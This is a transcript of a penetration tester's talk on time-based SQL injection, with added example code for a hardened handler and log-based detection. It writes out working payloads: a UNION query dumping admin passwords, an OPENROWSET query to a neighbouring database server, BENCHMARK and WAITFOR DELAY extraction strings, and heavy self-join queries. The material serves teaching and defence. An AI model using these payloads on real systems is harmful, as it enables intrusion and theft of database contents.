Time Based SQL Injection
Presentation Transcript
Time Based SQL Injection

Presented by Muhaimin Dzulfakar


Who am I

  • Muhaimin Dzulfakar

  • Security Consultant – Security-Assessment.com

  • Application and network pen-tester


Agenda

  • What is time based SQL Injection

  • Differences between blind and time based SQL Injection

  • Time based injection with heavy queries

  • Limitation of time based SQL Injection


Different types of SQL Injection

  • In Band Injection

  • Out of Band Injection

  • Blind SQL Injection

  • Time Based SQL Injection


In Band Injection

  • Results are embedded via union select

  • Useful when SQL error message is displayed

  • Fastest way to extract data

  • Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL SELECT null, null, null, null, concat(username,0x3a,admin_password), null from admin/*



Out of Band Injection

  • Use a different communication channel to drill for data
    Ex: Web Mail application in which data received via SMTP is processed

  • Example of attack: accessing your neighbour's database server with OOB injection
    Ex: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=;Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT user, pass FROM users') AS a--


Out of Band Injection

[Diagram: the www.buyviagra.com web server, its Database A, and the neighbouring Database B at 10.1.1.1 reached through the OOB injection]


Blind SQL Injection

  • Application generates custom error message for failed response and normal page for successful response

  • Comparison between true and false response

  • AND 1=1 -> true
  • AND 1=2 -> false

  • Read data byte by byte




Time Based SQL Injection

  • Use time delay to differentiate between true and false

  • True response – time delay is executed

  • Failed response – time delay is not executed

  • Read data byte by byte – exactly the same method as blind injection

  • First example: Chris Anley's paper “(more) Advanced SQL Injection”

  • Another example: David Litchfield's paper “Data Mining with SQL Injection and Inference”


When we need Time Based SQL Injection

  • When the application shows the default page for both the true and the false response

  • When the application shows the same custom error page for both the true and the false response

  • The injection succeeds, but its result cannot be seen by the attacker


Scenario 1 (Blind Injection attack)

$default=1
if value is not between 1-20
{
    redirect user to page.php?id=$default
    execute SQL statement
}

1 AND 1=1 [TRUE]  -> default page displayed
1 AND 1=2 [FALSE] -> default page displayed

BLIND INJECTION FAILED!


Scenario 1 (Time Based Blind Injection attack)

$default=1
if value is not between 1-20
{
    redirect user to page.php?id=$default
    execute SQL statement
}

1 AND 1=1 [TRUE]  -> takes 5 seconds to respond
1 AND 1=2 [FALSE] -> takes 1 second to respond

TIME BASED BLIND INJECTION WORKS!
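The two Scenario 1 slides, modelled as an added example that is not code from the presentation: a Python handler over a constructed in-memory SQLite table that behaves like the slide's page.php, with a hardened version beside it. SQLite has no delay function, so the row count the query really matched stands in for what a time delay would make observable.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the database behind page.php?id=...
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
conn.executemany("INSERT INTO pages VALUES (?, ?)",
                 [(i, f"page {i}") for i in range(1, 21)])
DEFAULT_ID = 1


def in_range(value):
    """The slide's 'value is between 1-20' check, done strictly on the text."""
    return re.fullmatch(r"[1-9]|1[0-9]|20", value.strip()) is not None


def vulnerable_lookup(value):
    """Scenario 1 handler. Returns (page shown, rows the SQL actually matched).

    The statement runs with the raw parameter spliced in; only afterwards is
    out-of-range input redirected to the default page. The visible response is
    the same for a true and a false injected condition (blind injection fails),
    but the database still evaluated that condition, which is what a delay
    function or heavy query makes observable (time based injection works)."""
    matched = conn.execute("SELECT title FROM pages WHERE id = " + value).fetchall()
    shown = matched if in_range(value) else conn.execute(
        "SELECT title FROM pages WHERE id = ?", (DEFAULT_ID,)).fetchall()
    return shown[0][0], len(matched)


def hardened_lookup(value):
    """Same user-visible behaviour: validate first, then bind the id as an
    integer so attacker-controlled text never reaches the SQL parser."""
    page_id = int(value) if in_range(value) else DEFAULT_ID
    matched = conn.execute("SELECT title FROM pages WHERE id = ?", (page_id,)).fetchall()
    return matched[0][0], len(matched)
```

The vulnerable handler shows "page 1" for both "1 AND 1=1" and "1 AND 1=2", yet the query matched one row in the first case and none in the second; the hardened handler gives the same page and the same single row for both.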


Time Based SQL Injection

FALSE = 117ms

TRUE = 2478ms


Spot the difference

Blind Injection (for MySQL)

1 AND ASCII(substring((@@version),1,1))<52

If the first character of the database version is less than 4, it is true.
If the first character of the database version is 4 or more, it is false.

[Slide annotation labels on the query: position, query, operator, char]


Spot the difference

Time Based Blind Injection (for MySQL)

1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1))

If the first character of the database version is less than 4, execute BENCHMARK.
If the first character of the database version is not less than 4, do not execute BENCHMARK.

[Slide annotation labels on the query: char, count time, operator, time delay, query, position]


Time Based Injection on MSSQL

Time Based Injection (MSSQL)

1 AND if not(substring((select @@version),25,1) < 52) waitfor delay '0:0:9'--

If the selected character is less than 4, execute “waitfor delay”

[Slide annotation labels on the query: query, time delay, position, operator, char]


Other Databases

  • Oracle (without PL/SQL support), MS Access and DB2 do not have delay functions

  • Time Based Injection is still possible by using heavy queries

  • Chema Alonso and Jose Parada talked about this at Defcon 2008

  • Two ways to order the conditions in the 'where' clause:
    Light condition first
    Heavy condition first

  • Select A from B where ConditionA and ConditionB


Heavy condition first

  Heavy condition (100 sec) | Light condition (10 sec) | Heavy & Light condition | Result
  True                      | False                    | False                   | 110 seconds
  True                      | True                     | True                    | 110 seconds
  False                     | -                        | False                   | 100 seconds

Result from Alonso research


Light condition first

  Light condition (10 sec) | Heavy condition (100 sec) | Heavy & Light condition | Result
  True                     | False                     | False                   | 110 seconds
  True                     | True                      | True                    | 110 seconds
  False                    | -                         | False                   | 10 seconds

Result from Alonso research


Heavy Queries

  • Oracle evaluates the conditions from left to right

  • MS Access evaluates the conditions from right to left

  • MSSQL evaluates the light condition first

  • The table name needs to be known

  • Some of the well known default tables:
    MSSQL – sysusers
    MySQL – information_schema.columns
    Oracle – all_users
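A short model of the short-circuit evaluation behind both result tables and the evaluation-order slide above, added here and not part of Alonso's or the presenter's material. The costs (100 s heavy, 10 s light) are the slides' own; the three engine orders are the ones the slide names, and the `order` labels are this example's assumption.

```python
HEAVY, LIGHT = 100, 10  # condition costs in seconds, as in the slides' tables


def conjunction_time(conditions, order="written"):
    """Model 'WHERE ConditionA AND ConditionB' under short-circuit evaluation.

    conditions: (cost_seconds, truth_value) pairs in the order they are written.
    order: "written" (Oracle, left to right), "reversed" (MS Access, right to
    left) or "cheapest" (MSSQL, light condition first), per the Heavy Queries
    slide. Returns (result, seconds spent): evaluation stops at the first False
    condition, so anything after it costs nothing."""
    if order == "reversed":
        conditions = conditions[::-1]
    elif order == "cheapest":
        conditions = sorted(conditions, key=lambda c: c[0])
    spent = 0
    for cost, value in conditions:
        spent += cost
        if not value:
            return False, spent
    return True, spent


def result_table(first_cost, second_cost, order="written"):
    """Reproduce a slide table: rows are (first, second, result, seconds) for
    the three cases the slides show, first/second being the written order."""
    rows = []
    for first, second in [(True, False), (True, True), (False, True)]:
        written = [(first_cost, first), (second_cost, second)]
        rows.append((first, second) + conjunction_time(written, order))
    return rows


def observable_gap(heavy_written_first, order="written"):
    """Seconds separating a true light condition from a false one, the heavy
    condition being true. Zero means the engine pays for the heavy condition
    either way, so nothing about the light condition is observable; this is
    why the written order has to match the engine's evaluation order."""
    def total(light_value):
        heavy, light = (HEAVY, True), (LIGHT, light_value)
        written = [heavy, light] if heavy_written_first else [light, heavy]
        return conjunction_time(written, order)[1]
    return total(True) - total(False)
```

`result_table(HEAVY, LIGHT)` and `result_table(LIGHT, HEAVY)` give the two tables above; `observable_gap` shows that under left-to-right evaluation only the light-first order produces a timing difference, under right-to-left only the heavy-first order, and with MSSQL's cheapest-first evaluation the written order makes no difference.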


Heavy Queries

Example of time based injection using heavy queries on MSSQL (light condition evaluates first):

1 AND (select count(*) FROM sysusers as sys1, sysusers as sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8) > 0 AND 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers)

Suitable for databases that do not support time delay functions
Ex: Oracle and MS Access

[Slide annotation labels on the query: heavy query (the sysusers self-join), light query (the ASCII comparison)]


Limitation

  • Results are unreliable during busy periods, when server load alone changes response times

  • Time delay results also depend on how much data is stored in the table
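An added detection example, not from the presentation: a small Python analyser over constructed web-server log lines that flags the delay primitives and self-join heavy queries shown on these slides, and responses far slower than the endpoint's own baseline. The log format, hosts and timings are constructed; the query strings are the ones the slides use.

```python
import re
from collections import defaultdict
from statistics import median
from urllib.parse import unquote_plus

# Constructed log lines: client, method, URL, status, response time in ms.
SAMPLE_LOG = """\
10.0.0.5 GET /buy.php?id=7 200 121
10.0.0.9 GET /buy.php?id=1%20AND%20(SELECT%20IF((ASCII(SUBSTRING((SELECT%20@@version),1,1))<52),BENCHMARK(900000,SHA1(1)),1)) 200 2478
10.0.0.9 GET /buy.php?id=1%20AND%20(SELECT%20IF((ASCII(SUBSTRING((SELECT%20@@version),1,1))<53),BENCHMARK(900000,SHA1(1)),1)) 200 119
10.0.0.7 GET /buy.asp?id=1%20if%20not(...)%20waitfor%20delay%20'0:0:9'-- 200 9034
10.0.0.7 GET /buy.asp?id=1%20AND%20(select%20count(*)%20FROM%20sysusers%20as%20s1,%20sysusers%20as%20s2,%20sysusers%20as%20s3)%3E0 200 4210
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3}) (\d+)$")
# Delay primitives named on the slides (BENCHMARK, WAITFOR DELAY) plus MySQL SLEEP().
DELAY_RE = re.compile(r"benchmark\s*\(|waitfor\s+delay|\bsleep\s*\(", re.I)
# Aliased table references; one table aliased 3+ times is the heavy-query self-join shape.
ALIAS_RE = re.compile(r"\b([a-z_][\w.]*)\s+as\s+\w+", re.I)

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _method, url, _status, ms = m.groups()
    path, _, query = url.partition("?")
    return {"ip": ip, "path": path, "query": unquote_plus(query), "ms": int(ms)}

def signature_hits(query):
    hits = []
    if DELAY_RE.search(query):
        hits.append("delay-function")
    names = [n.lower() for n in ALIAS_RE.findall(query)]
    if names and max(names.count(n) for n in set(names)) >= 3:
        hits.append("heavy-self-join")
    return hits

def analyse(log_text, ratio=10, min_samples=3):
    """(ip, path, reasons) per request matching a signature or taking >= ratio x the path's median."""
    entries = [e for e in map(parse_line, log_text.splitlines()) if e]
    by_path = defaultdict(list)
    for e in entries:
        by_path[e["path"]].append(e["ms"])
    alerts = []
    for e in entries:
        reasons = signature_hits(e["query"])
        times = by_path[e["path"]]
        if len(times) >= min_samples and e["ms"] >= ratio * median(times):
            reasons.append("slow-vs-baseline")
        if reasons:
            alerts.append((e["ip"], e["path"], reasons))
    return alerts
```

The false-branch BENCHMARK request (119 ms) is caught only by the signature, and /buy.asp has too few samples for a baseline, so the two checks cover each other's blind spots; the limitation above (load and table size moving the timings) is exactly why a baseline check alone is not enough.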



